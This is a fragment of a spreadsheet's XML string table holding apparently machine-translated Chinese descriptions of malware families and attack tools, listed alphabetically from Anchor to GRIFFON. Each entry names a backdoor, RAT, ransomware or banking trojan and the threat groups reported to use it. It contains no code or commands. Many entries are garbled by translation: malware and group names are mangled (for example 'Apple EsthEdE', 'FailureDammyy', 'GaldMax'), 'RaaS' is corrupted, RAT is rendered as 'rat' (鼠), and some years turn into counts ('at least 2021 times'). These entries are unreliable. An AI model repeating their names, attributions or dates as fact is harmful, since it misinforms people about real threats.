    <t>Anchor是后门恶意软件家族中的一员，自2018年以来，它与TrickBot一起被用于选定的高知名度目标。</t>
  </si>
  <si>
    <t>Android/AdDisplay。Ashas是广告软件的一种变体，通过谷歌Play商店中的多个应用程序分发。</t>
  </si>
  <si>
    <t>Android/Chuli。一个是安卓恶意软件，通过带有附件的先锋网络钓鱼电子邮件发送给维权组织。</t>
  </si>
  <si>
    <t>AndroidOS/MalLocker。B是针对Android设备的勒索软件系列的变体。它通过在所有其他窗口上显示包含赎金通知的屏幕来防止用户与UI交互。</t>
  </si>
  <si>
    <t>ANDROIDOS_ANSERVER。Android恶意软件是唯一的，因为它使用博客网站中的加密内容进行命令和控制。</t>
  </si>
  <si>
    <t>AndroRAT是允许第三方控制设备并收集信息的恶意软件。</t>
  </si>
  <si>
    <t>Anubis是安卓恶意软件，最初用于网络间谍活动，现已被改造为银行特洛伊木马。</t>
  </si>
  <si>
    <t>AppleJeus是一个下载程序家族，最初发现于2018年，嵌入在特洛伊加密货币应用程序中。AppleJeus已被Lazarus Group使用，目标是能源、金融、政府、工业、技术和电信部门的公司，以及包括美国、英国、韩国、澳大利亚、巴西、新西兰和俄罗斯在内的多个国家。AppleJeus被用来分发FALLCHILL鼠。</t>
  </si>
  <si>
    <t>Apple EsthEdE是KimSuky公司的一个后门，至少在2021以后，它一直瞄准韩国政府、学术和商业目标。</t>
  </si>
  <si>
    <t>Aria body是Naikon自2017年左右开始使用的定制后门。</t>
  </si>
  <si>
    <t>Arp显示有关系统地址解析协议（Arp）缓存的信息。</t>
  </si>
  <si>
    <t>Asacub是一种银行特洛伊木马，试图从受害者的银行账户中窃取资金。它试图通过从受损设备通过短信发起电汇来实现这一点。</t>
  </si>
  <si>
    <t>ASPXSpy是一个Web shell。威胁组织3390参与者对其进行了修改，以创建ASPXTool版本。</t>
  </si>
  <si>
    <t>Astaroth是特洛伊木马和信息窃取者，已知会影响欧洲、巴西和整个拉丁美洲的公司。至少从2017年底起，它就被公开了。</t>
  </si>
  <si>
    <t>at用于安排系统上的任务在指定的日期或时间运行。</t>
  </si>
  <si>
    <t>Attor是一个基于Windows的间谍平台，自2013年以来一直在使用。Attor有一个可加载的插件架构，可以为特定目标定制功能。</t>
  </si>
  <si>
    <t>AuditCred是Lazarus Group在2018年攻击期间使用的恶意DLL。</t>
  </si>
  <si>
    <t>AutoIt backdoor是一种恶意软件，由负责季风运动的参与者使用。演员们经常把它用于武器化。pps文件利用CVE-2014-6352。此恶意软件使用合法的脚本语言实现同名Windows GUI自动化。</t>
  </si>
  <si>
    <t>AVADDON是用C++编写的勒索软件，它至少在2020年6月被提供为RANSOMADS-AS服务（RAAS）。</t>
  </si>
  <si>
    <t>Azorult是一种商业特洛伊木马，用于从受损主机窃取信息。早在2016年就在野外观察到了Azorult。2018年7月，Azorult被用于针对北美目标的网络钓鱼活动。Azorult被用于加密货币盗窃。</t>
  </si>
  <si>
    <t>Babuk是一个至少2021使用过的RANSOMASIS服务（RAAS）恶意软件。Babuk的运营商采用“大博弈搜索”的方法，以大型企业为目标，并运营一个泄密网站，发布被盗数据，作为勒索计划的一部分。</t>
  </si>
  <si>
    <t>BabySharek是一个基于Microsoft Visual Basic（VB）脚本的恶意软件家族，据信与几次朝鲜活动有关。</t>
  </si>
  <si>
    <t>BackConfig是一种定制特洛伊木马，具有灵活的插件体系结构，Patchwork一直在使用它。</t>
  </si>
  <si>
    <t>BACKSPACE是APT30使用的后门，至少可以追溯到2005年。</t>
  </si>
  <si>
    <t>Bad Rabbit是一种自我传播的勒索软件，2017年影响了乌克兰的交通部门。Bad Rabbit还针对俄罗斯的组织和消费者。</t>
  </si>
  <si>
    <t>BADCALL是Lazarus group使用的特洛伊恶意软件变体。</t>
  </si>
  <si>
    <t>BADFLICK是利维坦在2018年首次报道的针对美国工程和海运行业的网络钓鱼活动中使用的后门。</t>
  </si>
  <si>
    <t>BadPatch是一种Windows特洛伊木马，曾用于与加沙黑客有关的活动。</t>
  </si>
  <si>
    <t>Bankshot是国土安全部于2017年12月首次报告的远程访问工具（RAT）。2018年，Lazarus集团利用资金注入攻击土耳其金融业。</t>
  </si>
  <si>
    <t>Bazar是一款下载和后门软件，至少从2020年4月开始使用，主要针对美国和欧洲的专业服务、医疗保健、制造业、IT、物流和旅游公司。据报道，Bazar与TrickBot活动有关，可用于部署额外的恶意软件，包括勒索软件，并窃取敏感数据。</t>
  </si>
  <si>
    <t>BBK是一款下载器，至少从2019年开始被青铜管家使用。</t>
  </si>
  <si>
    <t>BBSRAT是具有远程访问工具功能的恶意软件，已被用于有针对性的危害。</t>
  </si>
  <si>
    <t>BendyBear是一个x64外壳代码，用于零级植入，用于从C2服务器下载恶意软件。BendyBear于2020年8月首次被发现，它与之前属于中国网络间谍组织BlackTech的恶意软件Waterbear有着多种相同的功能。</t>
  </si>
  <si>
    <t>Bisonal是一种恶意软件，用于攻击俄罗斯、韩国和日本的目标。自2014年以来，人们一直在野外观察到这种情况。</t>
  </si>
  <si>
    <t>BITPayMeMe是一个勒索软件变体，首先观察到2017年8月在英国的BITPayMeR医院，它使用独特的加密密钥、赎金记录和每个操作的联系信息。BitPaymer有几个指标表明与Dridex恶意软件存在重叠，通常通过Dridex交付。</t>
  </si>
  <si>
    <t>BITSAdmin是一个用于创建和管理BITS作业的命令行工具。</t>
  </si>
  <si>
    <t>BLACKCOFFEE是一种恶意软件，至少从2013年起就被几个中国团体使用。</t>
  </si>
  <si>
    <t>BlackEnergy是一个恶意软件工具包，已被犯罪和APT参与者使用。它至少可以追溯到2007年，最初设计用于创建用于进行分布式拒绝服务（DDoS）攻击的僵尸网络，但它的使用已经演变为支持各种插件。众所周知，它在2008年格鲁吉亚和俄罗斯对峙期间被使用，也被用于针对乌克兰机构。变型包括BlackEnergy 2和BlackEnergy 3。</t>
  </si>
  <si>
    <t>BlackMold是一个基于中国斩波器的网络外壳，用于运行微软IIS的服务器。2019年12月首次报道，GALLIUM已将其用于针对电信提供商的恶意活动。</t>
  </si>
  <si>
    <t>BLINDINGCAN是一种远程访问特洛伊木马，自2020年初以来，朝鲜政府至少在针对西欧和美国国防、工程和政府组织的网络行动中使用了该木马。</t>
  </si>
  <si>
    <t>Bonadan是OpenSSH的恶意版本，充当自定义后门。Bonadan至少从2018年开始活跃，并将一个新的加密货币挖掘模块与Onderon系列后门使用的相同凭证窃取模块相结合。</t>
  </si>
  <si>
    <t>BONDUPDATER是OilRig使用的PowerShell后门。2017年11月，在针对一家中东政府组织的过程中首次观察到这种情况，2018年8月，观察到一种更新版本被用于针对一家政府组织的网络钓鱼电子邮件。</t>
  </si>
  <si>
    <t>BoBOBOX是一个下载器，负责执行至少2021的APT29的下一个阶段组件。</t>
  </si>
  <si>
    <t>BOOSTWRITE是一个精心设计的加载程序，可以通过滥用FIN7使用的应用程序的DLL搜索顺序来启动。</t>
  </si>
  <si>
    <t>BOOTRASH是一款针对Windows操作系统的引导工具包。针对金融部门的威胁行为体一直在使用它。</t>
  </si>
  <si>
    <t>Box Caon是一个Windows后门，它被INGigZrima在2021次针对阿富汗政府官员的枪战中使用。BoxCaon的名字源于与恶意软件家族xCaon的相似之处。</t>
  </si>
  <si>
    <t>BrainTest是Android恶意软件的一个家族。</t>
  </si>
  <si>
    <t>Bread是一个大规模的账单欺诈恶意软件家族，以采用多种不同的伪装和模糊技术，试图持续逃避Google Play Store的恶意软件检测而闻名。在被用户下载之前，谷歌Play商店检测到并删除了1700个独特的面包应用。</t>
  </si>
  <si>
    <t>Bobba是Elderwood用来打开后门并将文件下载到受损主机的特洛伊木马。</t>
  </si>
  <si>
    <t>BS2005是一种恶意软件，至少自2011年以来，Ke3chang就在网络钓鱼活动中使用它。</t>
  </si>
  <si>
    <t>BUBBLEWRAP是一款功能齐全的第二阶段后门，由admin@338小组。它被设置为在系统启动时运行，包括检查、上载和注册插件的功能，这些插件可以进一步增强其功能。</t>
  </si>
  <si>
    <t>build_downer是青铜管家至少从2019年开始使用的一款下载器。</t>
  </si>
  <si>
    <t>Bundlere是为macOS编写的广告软件，至少从2015年开始使用。虽然Bundlere被归类为广告软件，但它有许多与更传统的后门相关的功能。</t>
  </si>
  <si>
    <t>BusyGasper是自2016年5月开始使用的安卓间谍软件。目前只有不到10名受害者，他们似乎都在俄罗斯，都是通过实际接触该设备感染的。</t>
  </si>
  <si>
    <t>Cachedump是一个公开可用的工具，该程序从系统注册表中提取缓存的密码哈希。</t>
  </si>
  <si>
    <t>Cadelspy是APT39使用的后门。</t>
  </si>
  <si>
    <t>CALENDAR是APT1使用的恶意软件，模仿合法的Gmail日历流量。</t>
  </si>
  <si>
    <t>Calisto是一种macOS特洛伊木马，可在受损机器上打开后门。据信，Calisto最早是在2016年开发的。</t>
  </si>
  <si>
    <t>CallMe是一款专为在Apple OSX上运行而设计的特洛伊木马。它基于一个名为Tiny SHell的公开工具。</t>
  </si>
  <si>
    <t>Cannon是一种特洛伊木马，其变体用C#和Delphi编写。2018年4月首次观测到。</t>
  </si>
  <si>
    <t>Carbanak是一个功能齐全的远程后门，由同名团队（Carbanak）使用。它用于间谍活动、数据过滤，并提供对受感染机器的远程访问。</t>
  </si>
  <si>
    <t>Carberp是一种窃取凭证和信息的恶意软件，至少从2009年起就一直处于活动状态。CARBLP的源代码在2013被泄露到网上，随后被用作CARBANK后门的基础。</t>
  </si>
  <si>
    <t>CarbonSteal是四个监控软件工具家族中的一个，它们共享一个通用的C2基础设施。CarbonSteal主要处理音频监控。</t>
  </si>
  <si>
    <t>Cardinal RAT是自2015年12月以来发现的一种潜在的低容量远程访问特洛伊木马（RAT）。Cardinal RAT以其对未编译C#源代码和Microsoft Windows内置csc的独特利用而闻名。exe编译器。</t>
  </si>
  <si>
    <t>CARROTBALL是一个FTP下载工具，至少从2019年开始使用。CARROTBALL已被用作安装SYSCON的下载程序。</t>
  </si>
  <si>
    <t>Carrortbat是一款定制滴管，至少从2017年开始使用。Carrortbat已被用于安装SYSCON，并与KONNI有基础设施重叠。</t>
  </si>
  <si>
    <t>Catchamas是一种Windows特洛伊木马，可从受损系统窃取信息。</t>
  </si>
  <si>
    <t>Caterpillar WebShell是由Volatile Cedar集团自主开发的Web Shell工具。</t>
  </si>
  <si>
    <t>CCBkdr是一种恶意软件，被注入CCleaner的签名版本，并从CCleaner的分发网站分发。</t>
  </si>
  <si>
    <t>Cerberus是一种银行特洛伊木马，可以在地下论坛和市场上租用。在可以出租之前，Cerberus索赔的作者在私人运营中使用了两年。</t>
  </si>
  <si>
    <t>certutil是一个命令行实用程序，可用于获取证书颁发机构信息和配置证书服务。</t>
  </si>
  <si>
    <t>Chaes是一个多级信息窃取者，用多种编程语言编写，收集登录凭证、信用卡号和其他财务信息。Chaes首次出现在2020年，似乎主要针对巴西的受害者以及拉丁美洲的其他电子商务客户。</t>
  </si>
  <si>
    <t>Chaos是一种Linux恶意软件，通过对SSH服务的暴力攻击危害系统。一旦安装，它会为其控制器提供一个反向外壳，由未经请求的数据包触发。</t>
  </si>
  <si>
    <t>Charger是一种Android恶意软件，它从用户的设备上窃取联系人和短信。如果获得管理员权限，它还可以锁定设备并要求支付赎金。</t>
  </si>
  <si>
    <t>ChChes是一种特洛伊木马，似乎仅由menuPass使用。2016年，它被用于针对日本组织。它缺乏持久性方法，这表明它可能是第一阶段的工具。</t>
  </si>
  <si>
    <t>CHEMISTGAMES是由Sandworm团队部署的模块化后门。</t>
  </si>
  <si>
    <t>Cherry Picker是一款销售点（PoS）记忆刮刀。</t>
  </si>
  <si>
    <t>China Chopper是一个托管在Web服务器上的网络外壳，用于提供对企业网络的访问，而企业网络不依赖于受感染的系统调用远程命令和控制服务器。它已被几个威胁组织使用。</t>
  </si>
  <si>
    <t>Chomptick是由APT28使用的模块化后门组成的恶意软件家族。它至少从2012年开始使用，通常作为第二阶段恶意软件投放到受害者身上，尽管它在一些情况下被用作第一阶段恶意软件。它有Windows和Linux两种版本。它与Android的X-Agent是分开追踪的。</t>
  </si>
  <si>
    <t>Clop是一个勒索软件家族，于2019年2月首次被发现，并被用于零售、运输和物流、教育、制造、工程、汽车、能源、金融、航空航天、电信、专业和法律服务、医疗保健和高科技行业。Clop是CryptoMix勒索软件的变种。</t>
  </si>
  <si>
    <t>CloudDuke是APT29在2015年使用的恶意软件。</t>
  </si>
  <si>
    <t>cmd是Windows命令行解释器，可用于与系统交互并执行其他进程和实用程序。 [1]</t>
  </si>
  <si>
    <t>Cobalt Strike是一款商业化、功能齐全的远程访问工具，自称“敌方模拟软件，旨在执行有针对性的攻击，并模拟高级威胁参与者的攻击后行动”。Cobalt Strike的交互式攻击后能力涵盖了ATT&amp;amp;CK战术的全部范围，所有这些战术都在一个单一的集成系统中执行。</t>
  </si>
  <si>
    <t>Cobian RAT是一种后门远程访问工具，自2016年以来一直被观察到。</t>
  </si>
  <si>
    <t>CoinTicker是一个恶意应用程序，它伪装成加密货币价格代码，并安装开源后门EvilOSX和EggShell的组件。</t>
  </si>
  <si>
    <t>Comnie是一个远程后门，曾用于东亚的攻击。</t>
  </si>
  <si>
    <t>ComRAT是一种二期植入物，被怀疑是Agent的后代。btz，供图拉使用。ComRAT的第一个版本是在2007年确定的，但该工具已经经历了多年的实质性开发。</t>
  </si>
  <si>
    <t>Concipit1248是一款iOS间谍软件，与Android间谍软件Corona更新的开发者同名。进一步调查显示，这两个软件包含相同的C2 URL和类似的功能。</t>
  </si>
  <si>
    <t>Conficker是2008年10月首次检测到的一种计算机蠕虫，它利用MS08-067 Windows漏洞针对Microsoft Windows进行传播。2016年，Conficker的一种变体出现在一座核电站的计算机和可移动磁盘驱动器上。</t>
  </si>
  <si>
    <t>ConnectWise是一种合法的远程管理工具，至少自2016年以来，包括MuddyWater和GOLD SOUTHFIELD在内的威胁参与者一直在使用它来连接目标环境并在目标环境中进行横向移动。</t>
  </si>
  <si>
    <t>Conti是一种勒索软件即服务，于2019年12月首次被观察到，并通过TrickBot分发。它被用来对付大公司和政府机构，尤其是北美的那些机构。与其他勒索软件家族一样，使用Conti的参与者从受损网络窃取敏感文件和信息，并威胁除非支付赎金，否则将公布这些数据。</t>
  </si>
  <si>
    <t>CookieMiner是基于mac的恶意软件，其目标是与加密货币交换相关的信息，并在受害者系统本身上启用加密货币挖掘。2019年首次在野外发现。</t>
  </si>
  <si>
    <t>CORALDECK是APT37使用的一种过滤工具。</t>
  </si>
  <si>
    <t>CORESHELL是APT28使用的下载程序。该恶意软件的旧版本称为SOURFACE，新版本称为CORESHELL。</t>
  </si>
  <si>
    <t>Corona Updates是利用冠状病毒大流行的Android间谍软件。分发此间谍软件的活动被追踪为Project Spy。该间谍软件的多个变种被发现托管在谷歌Play商店中。</t>
  </si>
  <si>
    <t>CosmicDuke是APT29在2010年至2015年间使用的恶意软件。</t>
  </si>
  <si>
    <t>CostaBricks是在Costarito战役中用于部署32位后门的加载程序。</t>
  </si>
  <si>
    <t>CozyCar是APT29在2010年至2015年间使用的恶意软件。它是一个模块化的恶意软件平台，其后门组件可以被指示下载并执行具有不同功能的各种模块。</t>
  </si>
  <si>
    <t>CrackMapExec，或CME，是一种用Python开发的后开发工具，旨在针对网络进行渗透测试。CrackMapExec收集Active Directory信息，通过目标网络进行横向移动。</t>
  </si>
  <si>
    <t>Crimson是一种远程访问特洛伊木马，透明部落至少从2016年开始使用。</t>
  </si>
  <si>
    <t>CrossRAT是一种跨平台的老鼠。</t>
  </si>
  <si>
    <t>Crutch是专为文件盗窃而设计的后门，Turla至少从2015年开始使用它。</t>
  </si>
  <si>
    <t>Cryptoistic是一个后门，用Swift编写，Lazarus Group使用过。</t>
  </si>
  <si>
    <t>CSPY Downloader是一种旨在逃避分析并下载Kimsuky使用的额外有效载荷的工具。</t>
  </si>
  <si>
    <t>Dacls是Lazarus Group自2019年12月起使用的一种多平台远程访问工具。</t>
  </si>
  <si>
    <t>DarkComet是Windows远程管理工具和后门。</t>
  </si>
  <si>
    <t>DASRF是一个后门，被用来监视和窃取日本、韩国、俄罗斯、新加坡和中国的受害者。研究人员已经确定了用Visual C和Delphi编写的版本。</t>
  </si>
  <si>
    <t>DDKONG是恶意软件样本，是Rancor发起的一场运动的一部分。DDKONG于2017年2月首次被使用。</t>
  </si>
  <si>
    <t>DealersChoice是APT28使用的一个Flash开发框架。</t>
  </si>
  <si>
    <t>Deatransom是一款用C语言编写的勒索软件，至少从2020年开始使用，它可能与FIVEHANDS和HELLOKITTY有重叠。</t>
  </si>
  <si>
    <t>DEFENSOR ID是一种银行特洛伊木马，能够清除受害者的银行帐户或加密货币钱包，并接管电子邮件或社交媒体帐户。DEFENSOR ID通过滥用Android的可访问性服务来执行其大部分恶意功能。</t>
  </si>
  <si>
    <t>Dendroid是一款Android远程访问工具（RAT），主要面向西方国家。这款RAT售价300美元，与一个将RAT注入合法应用程序的实用程序捆绑在一起。</t>
  </si>
  <si>
    <t>Denis是APT32使用的Windows后门和特洛伊木马程序。丹尼斯与SOUNDBITE后门有几个相似之处，并与Goopy后门一起使用。</t>
  </si>
  <si>
    <t>Derusbi是多个中国APT团体使用的恶意软件。已经观察到Windows和Linux的变种。</t>
  </si>
  <si>
    <t>Dipsind是一个后门恶意软件家族，似乎是由PLATINUM独家使用的。</t>
  </si>
  <si>
    <t>DOGCALL是APT37使用的后门，2017年被用来攻击韩国政府和军事组织。它通常是使用韩语文字处理器（HWP）漏洞删除的。</t>
  </si>
  <si>
    <t>Dok是一个伪装成木马的特洛伊应用程序。能够收集用户凭据并安装恶意代理服务器以重定向用户网络流量（即中间的对手）的zip文件。</t>
  </si>
  <si>
    <t>Doki是一个后门，使用独特的基于Dogecoin的域生成算法，于2020年7月首次被观察到。Doki与Ngrok Mining僵尸网络一起用于针对云平台中Docker服务器的活动。</t>
  </si>
  <si>
    <t>DoubleAgent是一个可追溯到2013年的鼠类恶意软件家族，已知目标群体与中国政府有争议关系。</t>
  </si>
  <si>
    <t>down_new是一款下载器，至少从2019年起就被Brown BUTLER使用。</t>
  </si>
  <si>
    <t>Downdelph是用Delphi编写的第一阶段下载程序，APT28在2013年至2015年间很少使用它。</t>
  </si>
  <si>
    <t>DownPaper是后门特洛伊木马；其主要功能是下载并运行第二阶段恶意软件。</t>
  </si>
  <si>
    <t>DressCode是Android恶意软件家族。</t>
  </si>
  <si>
    <t>Dridex是一款多产的银行特洛伊木马，最早出现于2014年。截至2019年12月，美国财政部估计，Dridex已经感染了40多个国家的数百家银行和金融机构的计算机，导致超过1亿美元的盗窃。Dridex是由Bugat banking特洛伊木马（也称为Cridex）的源代码创建的。</t>
  </si>
  <si>
    <t>DroidJack是一款安卓远程访问工具，人们观察到它伪装成合法的应用程序，包括超级马里奥运行和口袋妖怪GO游戏。</t>
  </si>
  <si>
    <t>DropBook是一个基于Python的后门程序，使用PyInstaller编译。</t>
  </si>
  <si>
    <t>Drovorub是一个Linux恶意软件工具集，由代理、客户端、服务器和内核模块组成，已被APT28使用。</t>
  </si>
  <si>
    <t>dsquery是一个命令行实用程序，可用于在Active Directory中查询域内系统的信息。它通常只安装在Windows Server版本上，但可以通过Microsoft提供的远程服务器管理工具捆绑包安装在非服务器版本上。</t>
  </si>
  <si>
    <t>Dtrack是一种间谍软件，于2019年被发现，并被用于攻击印度金融机构、研究机构和库丹库拉姆核电站。Dtrack与Darkseul运动有相似之处，后者被认为是拉扎勒斯集团的产物。</t>
  </si>
  <si>
    <t>DualToy是Windows恶意软件，在通过USB连接的Android和iOS设备上安装恶意应用程序。</t>
  </si>
  <si>
    <t>Duqu是一个恶意软件平台，在目标网络中部署后使用模块化方法扩展功能。</t>
  </si>
  <si>
    <t>DustySky是一种多阶段的恶意软件。自2015年5月以来被鼹鼠使用的网络。</t>
  </si>
  <si>
    <t>Dvmap是将恶意代码注入系统运行库的恶意软件的根源。它被认为是第一个执行这种类型代码注入的恶意软件。</t>
  </si>
  <si>
    <t>Dyre是一种银行特洛伊木马，用于获取经济利益。</t>
  </si>
  <si>
    <t>Ebury是一个针对Linux操作系统的SSH后门。攻击者需要根级别的访问权限，这允许他们替换SSH二进制文件（SSH、sshd、SSH add等）或修改OpenSSH使用的共享库（libkeyutils）。</t>
  </si>
  <si>
    <t>EccentricBandWang是朝鲜网络参与者使用的远程访问特洛伊木马（RAT），于2020年8月首次被识别。它是一种侦察工具，具有键盘记录和屏幕捕获功能，用于收集受损系统上的信息。</t>
  </si>
  <si>
    <t>Ecipekac是一种多层装载机，menuPass至少从2019年开始使用，包括用作P8RAT、SodaMaster和FYAnti的装载机。</t>
  </si>
  <si>
    <t>Egregor是一种勒索软件即服务（RaaS）工具，于2020年9月首次被观察到。研究人员注意到Egregor和Sekhmet勒索软件以及迷宫勒索软件之间的代码相似性。</t>
  </si>
  <si>
    <t>EKANS是勒索软件的变种，首次出现在2019年12月中旬。EKANS不同于其他勒索软件，因为它是在Golang编写的，旨在停止与工业控制系统相关的服务和流程。</t>
  </si>
  <si>
    <t>Elise是一个定制的后门特洛伊木马程序，似乎只被Lotus Blossom使用。它是被称为LStudio、ST group和APT0LSTU的更大工具组的一部分。</t>
  </si>
  <si>
    <t>ELMER是一个用Delphi编写的非持久性、代理感知HTTP后门，已被APT16使用。</t>
  </si>
  <si>
    <t>Emissary是莲花使用的特洛伊木马。它与Elise共享代码，两个特洛伊木马都是被称为LStudio的恶意软件组的一部分。</t>
  </si>
  <si>
    <t>Emotet是一种模块化恶意软件变体，主要用作TrickBot和IcedID等其他恶意软件变体的下载程序。Emotet于2014年6月首次出现，主要用于针对银行业。</t>
  </si>
  <si>
    <t>Empire是一个开源、跨平台的远程管理和后期开发框架，可在GitHub上公开获得。虽然该工具本身主要是用Python编写的，但攻击后代理是用纯PowerShell for Windows和Python for Linux/macOS编写的。《帝国》是一份关于被对手广泛使用的公开黑客工具的联合报告中挑选出来的五种工具之一。</t>
  </si>
  <si>
    <t>EnvyScOUT是一个滴管，它被APT29的使用至少2021。</t>
  </si>
  <si>
    <t>Epic是Turla使用的后门。</t>
  </si>
  <si>
    <t>esentutl是一个命令行工具，为Windows可扩展存储引擎提供数据库实用程序。</t>
  </si>
  <si>
    <t>eSurv是为合法拦截市场设计的移动监控软件，经过多年的发展。</t>
  </si>
  <si>
    <t>EventBot是安卓银行特洛伊木马和信息窃取程序，它滥用安卓的易访问性服务从各种应用程序窃取数据。EventBot旨在针对200多个不同的银行和金融应用程序，其中大多数是欧洲银行和加密货币兑换应用程序。</t>
  </si>
  <si>
    <t>EviBunny是从2011开始观察到的C++恶意软件样本，它被设计为LUA脚本的执行平台。</t>
  </si>
  <si>
    <t>EvilGrab是一个具有常见侦察功能的恶意软件家族。menuPass通过恶意的Microsoft Office文档部署了它，作为网络钓鱼活动的一部分。</t>
  </si>
  <si>
    <t>EVILNUM是2018年首次确定的完全有能力的后门。Evillnum由同名的APT组Evillnum使用。</t>
  </si>
  <si>
    <t>Exramel for Linux是一个用Go编程语言编写的后门程序，编译为64位ELF二进制文件。Windows版本在Exramel for Windows下单独跟踪。</t>
  </si>
  <si>
    <t>Exramel for Windows是一个用于瞄准Windows系统的后门。Linux版本在Exramel for Linux下单独跟踪。</t>
  </si>
  <si>
    <t>Exobot是安卓银行恶意软件，主要针对德国、奥地利和法国的金融机构。</t>
  </si>
  <si>
    <t>Exodus是Android间谍软件，分为两个不同的阶段部署，分别是Exodus One（dropper）和Exodus two（payload）。</t>
  </si>
  <si>
    <t>Expand是一个Windows实用程序，用于扩展一个或多个压缩的CAB文件。BBSRAT使用它将CAB文件解压缩为可执行内容。</t>
  </si>
  <si>
    <t>Explosive是Volatile Cedar集团使用的定制远程访问工具。2015年首次在野外发现。</t>
  </si>
  <si>
    <t>FakeM是一款基于外壳代码的Windows后门，被Scarlet Mick使用。</t>
  </si>
  <si>
    <t>FakeSpy是一款安卓间谍软件，由中国威胁行动方在漫游螳螂活动背后操作。</t>
  </si>
  <si>
    <t>FALLCHILL是Lazarus Group自2016年以来一直使用的RAT，用于瞄准航空航天、电信和金融行业。它通常被其他Lazarus Group恶意软件删除，或在受害者无意中访问受损网站时交付。</t>
  </si>
  <si>
    <t>FatDuke是APT29的后门，至少从2016年开始使用。</t>
  </si>
  <si>
    <t>Felismus是Sowbug使用的模块化后门。</t>
  </si>
  <si>
    <t>FELIXROOT是一个后门，被用来攻击乌克兰受害者。</t>
  </si>
  <si>
    <t>Fgdump是Windows密码哈希转储程序。</t>
  </si>
  <si>
    <t>Final1stspy是一个dropper系列，用于发送DOGCALL。</t>
  </si>
  <si>
    <t>FinFisher是一种政府级商业监视间谍软件，据报道专门出售给政府机构，用于有针对性的合法刑事调查。它被严重混淆，并使用多种反分析技术。它还有其他变种，包括翼鸟。</t>
  </si>
  <si>
    <t>Fivand是一个用C++编写的DyStRANSOM软件的定制版本。FiWuthOne已经使用了至少2021个，包括RANSOMAST-AS-Service（RAAS）战役，有时伴随着SIMBRAT。</t>
  </si>
  <si>
    <t>Flame是一个复杂的工具包，至少自2010年以来一直用于收集信息，主要针对中东国家。</t>
  </si>
  <si>
    <t>FLASHFLOOD是APT30开发的恶意软件，允许通过可移动设备传播和过滤数据。APT30可以使用此功能跨气隙过滤数据。</t>
  </si>
  <si>
    <t>FailureDammyy是2016年初首次出现的远程访问工具（RAT）。有缺陷的Ammyy的代码基于泄露的远程访问软件Ammyy Admin版本的源代码。</t>
  </si>
  <si>
    <t>FLWWELD GRADY是一个完全在C++中编写的远程访问工具（RAT），它是在2017年底首次被观察到的。</t>
  </si>
  <si>
    <t>FlexiSpy是针对iOS和安卓系统的复杂监控软件。公开提供的全面分析只针对Android版本。</t>
  </si>
  <si>
    <t>FLIPSIDE是一个类似于Plink的简单工具，FIN5使用它来维护与受害者的联系。</t>
  </si>
  <si>
    <t>Forfiles是批处理作业中常用的Windows实用程序，用于在一个或多个选定的文件或目录上执行命令（例如：列出驱动器中的所有目录，读取昨天创建的所有文件的第一行，等等）。Forfiles可以从命令行、运行窗口或批处理文件/脚本执行。</t>
  </si>
  <si>
    <t>FrameworkPOS是FIN6用来从运行物理POS设备的系统窃取支付卡数据的销售点（POS）恶意软件。</t>
  </si>
  <si>
    <t>FrozenCell是监控软件家族的移动组件，其相应的桌面组件称为KasperAgent和Micropsia。</t>
  </si>
  <si>
    <t>FTP是一种常用于操作系统的实用程序，用于通过文件传输协议（FTP）传输信息。对手可以使用它将其他工具转移到系统上或过滤数据。</t>
  </si>
  <si>
    <t>FYAnti是menuPass至少从2020年开始使用的装载机，包括部署QuasarRAT。</t>
  </si>
  <si>
    <t>Fysbis是APT28使用的基于Linux的后门，至少可以追溯到2014年。</t>
  </si>
  <si>
    <t>Gazer是Turla从2016年开始使用的后门。</t>
  </si>
  <si>
    <t>GeminiDuke是APT29在2009年至2012年间使用的恶意软件。</t>
  </si>
  <si>
    <t>GET2是一个用C++编写的下载器，它被TA505使用，用来传递FLAWWIDGRACE、FLAWADMAY、抓取和SDBBOT。</t>
  </si>
  <si>
    <t>gh0st RAT是一种远程访问工具（RAT）。源代码是公开的，已经被多个团体使用。</t>
  </si>
  <si>
    <t>Ginp是一个安卓银行特洛伊木马，被用来攻击西班牙银行。其中一些代码直接取自阿努比斯。</t>
  </si>
  <si>
    <t>GLOOXMAIL是APT1使用的恶意软件，模仿合法的Jabber/XMPP流量。</t>
  </si>
  <si>
    <t>Golden Cup是一款安卓间谍软件，被用来瞄准世界杯球迷。</t>
  </si>
  <si>
    <t>GoldenEagle是一款安卓恶意软件，被用于针对维吾尔人、穆斯林、藏人、土耳其个人和中国个人。早在2012年就发现了样本。</t>
  </si>
  <si>
    <t>GoldenSpy是一个后门恶意软件，已与合法的税务筹划软件打包。GoldenSpy被发现的目标是中国的组织，它与“智能税务”软件套件一起交付，该软件套件由爱信诺信用信息有限公司的金税部门生产，需要支付当地税款。</t>
  </si>
  <si>
    <t>GoldFinder是一个用Go编写的自定义HTTP跟踪工具，它记录数据包在受损网络和C2服务器之间的路由。它可用于告知威胁参与者发现或记录其行为的潜在点，包括与其他恶意软件相关的C2。GoFifter是在2021年初在对Att29 SalARWEY网络入侵的调查中发现的。</t>
  </si>
  <si>
    <t>GaldMax是第二阶段C2后门，它被APT29使用，在2021年初发现了与Salar Wrand入侵有关的违规行为。GoldMax使用多种防御规避技术，包括避免虚拟化执行和屏蔽恶意流量。</t>
  </si>
  <si>
    <t>GolfSpy是Bouncing Golf集团部署的安卓间谍软件。</t>
  </si>
  <si>
    <t>Gooligan是一个恶意软件家族，它在Android设备上运行权限升级攻击，然后使用升级的权限窃取可用于访问许多谷歌应用程序数据的身份验证令牌。Gooligan被描述为Ghost Push Android恶意软件家族的一部分。</t>
  </si>
  <si>
    <t>Goopy是APT32使用的Windows后门和特洛伊木马程序，与该组织（Denis）使用的另一个后门程序有一些相似之处。Goopy因其模仿合法的Google Updater可执行文件而得名。</t>
  </si>
  <si>
    <t>GPlayed是一种Android特洛伊木马，具有广泛的功能。</t>
  </si>
  <si>
    <t>Grandoreiro是一种用Delphi编写的银行特洛伊木马，于2016年首次被发现，并使用恶意软件即服务（MaaS）商业模式。Grandoreiro已经确认了巴西、墨西哥、葡萄牙和西班牙的受害者。</t>
  </si>
  <si>
    <t>GravityRAT是一种远程访问工具（RAT），自2016年以来一直在开发中。该工具背后的参与者仍不得而知，但已找到两个与作者链接的用户名，分别是“Themarian”和“The Inventible”据印度国家计算机应急响应小组（CERT）称，在针对印度组织和实体的攻击中发现了该恶意软件。</t>
  </si>
  <si>
    <t>GreyEnergy是一个用C编写并在Visual Studio中编译的后门程序。GreyEnergy与BlackEnergy恶意软件有相似之处，并被认为是它的继任者。</t>
  </si>
  <si>
    <t>GRIFFON是FIN7使用的JavaScript后门。</t>
  </si>
  <si>
